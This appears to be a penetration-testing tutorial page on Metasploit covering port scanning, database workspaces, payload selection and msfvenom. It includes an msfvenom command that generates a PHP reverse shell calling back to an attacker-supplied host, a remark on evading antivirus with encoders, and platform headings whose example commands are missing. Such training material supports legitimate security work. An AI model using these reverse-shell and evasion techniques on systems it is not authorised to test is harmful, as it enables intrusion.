Exploitation
Exploitation using Metasploit.
Scanning
Metasploit has many modules for port scanning, these can be listed using search portscan
from msfconsole
. Port scanning modules usually require some options to be set, such as:
CONCURRENCY : number of ports to be scanned simultaneously
PORTS : port range to be scanned, different from nmap, nmap will scan the most used 1000 ports, Metasploit will scan from 1 to 10,000.
RHOSTS : target to scan
THREADS : number of threads to be used simultaneously
The /scanner/discovery/udp_sweep
module allows quick identification of UDP services, can help quickly identify DNS or NetBIOS.
The smb_enumshares
and smb_version
modules can be useful in corporate networks.
Metasploit Database
The Metasploit Database can be used to simplify attacking several targets. To initialise this, use systemctl start postgresql
followed by msfdb init
. To verify this is running, enter msfconsole
and then run db_status
.
On launch, you will be in the default workspace, this can be verified by typing workspace
. A workspace can be added using -a
or removed using -d
. You can jump between workspaces using workspace [workspace_name]
.
In a database version of Metasploit, you can use help
to list out the Database backend commands. Running db_nmap
will save all results to the database. Information on relevant target hosts and services can now be viewed using hosts
or services
respectively. Using hosts -R
will set the host(s) values to RHOSTS by default.
Vulnerability Scanning
Metasploit allows quick identification of critical vulnerabilities which can be considered "low hanging fruit". This is typically any easily exploitable and vulnerable service that would allow a foothold on a server or even high-level privilege access. The better you are at scanning and fingerprinting a service, the easier it will be to identify critical vulnerabilities.
Exploiting
Once you have selected an exploit, you can either use the default payload or select a payload using show payloads
then set payload [payload_name | line_number]
.
Msfvenom
Msfvenom allows you to generate your own payloads, it provides access to all available payloads in Metasploit and allows you to create them in many different formats, for many different systems. Msfvenom can generate a stand-alone payload or a usable raw format payload, you can list supported outputs by using msfvenom --list formats
.
Encoders can be applied to try to evade antivirus, in most cases modern obfuscation or injection methods are far more effective. Encoding can be used with the -e
option.
Example code to generate a generic php reverse shell would be: msfvenom -p php/reverse_php LHOST=[IP_ADDR] LPORT=[PORT] -f raw > reverse_shell.php
. The output will be missing the starting PHP comment tag and the end tag, these should be added to convert it to a working PHP file.
Commonly used examples will follow here, in these examples LHOST will be the attacking IP of your machine and LPORT will be the port the handler listens on:
For Linux:
Note for this one: .elf on Linux is like .exe on Windows, make sure when it is uploaded that it has executable permissions by running chmod +x rev_shell.elf
.
For Windows:
For PHP:
For ASP:
For Python:
Last updated